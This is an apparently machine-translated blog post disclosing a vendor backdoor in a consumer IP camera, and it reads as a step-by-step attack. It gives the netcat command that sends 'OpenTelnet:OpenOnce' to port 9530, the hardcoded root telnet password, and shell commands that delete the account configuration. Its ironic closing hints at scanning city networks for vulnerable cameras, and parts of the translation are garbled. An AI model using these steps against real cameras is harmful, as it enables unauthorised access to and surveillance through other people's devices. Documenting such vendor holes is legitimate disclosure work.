You are a big brother, or try yourself as an all-seeing eye.

Fairy Tale

I bought one master the door reliable, cast iron with locks on dohvuilard combinations, but after installation the steel loops creak. They called him a specialist in his kitchen waiting for tea, sipping his tea, suddenly the installer comes to him and says in a human voice " I am looking for a job. Loops smeared, go check." And his master asks him: "As you entered through the door, the iron one, all of yourself certified right and left." A manual worker responds to this “In order not to wait under the threshold when you open the master to please you, we have certified specialists decided to make a secret button with your hands, so that you knock on the upper left corner of the door, the door will open.”
')
Lies, you will think, so only in fairy tales it happens and you will be fundamentally wrong

In this post, convincingly and with examples I will convincingly prove that such developers exist.

I somehow got into the hands of an IP camera from a country famous for its unique quality of the equipment produced, with a password unknown, googling reset settings led me to a utility that reset this password, but the way in which it does it interests me.

This is what was originally discovered on the camera.

Host is up (0.0014s latency).
Not shown: 65529 closed ports
PORT STATE SERVICE
80 / tcp open http
554 / tcp open rtsp
8899 / tcp open ospf-lite
9527 / tcp open unknown
9530 / tcp open unknown
34567 / tcp open unknown

WEB password protected. CLI no.

We start tcpdump, we start the password reset utility.
We see that the command \ rOpenTelnet: OpenOnce is sent to port 9530 tcp. After that, telnet opens on the device and the program goes to port 23 and, with the help of pre-installed passwords, resets the configuration in terms of passwords.



Let's try to do everything manually
1. Open telnet on camera

nc 192.168.1.10 9530
\ rOpenTelnet: OpenOnce

check that it is open

nmap -p 1-65535 192.168.1.10

PORT STATE SERVICE
23 / tcp open telnet
80 / tcp open http
554 / tcp open rtsp
8899 / tcp open ospf-lite
9527 / tcp open unknown
9530 / tcp open unknown
34567 / tcp open unknown

We go under the standard password

telnet 192.168.1.10
Trying 192.168.1.10 ...
Connected to 192.168.1.10.
Escape character is '^]'.
LocalHost login: root
Password: xmhdipc
Welcome to Monitor Tech.
# rm -rf / mnt / mtd / Config / Account *
# reboot
# Connection closed by foreign host.

After rebooting, the camera is available via the web without a password. Enjoy.

What the equipment manufacturer is guided by when I leave such holes to me personally is not clear.

Dear readers, never scan the city network for which you would like to watch on the open port 9530, and do not perform the actions described above, this may lead to the desire to go on vacation or go on a trip.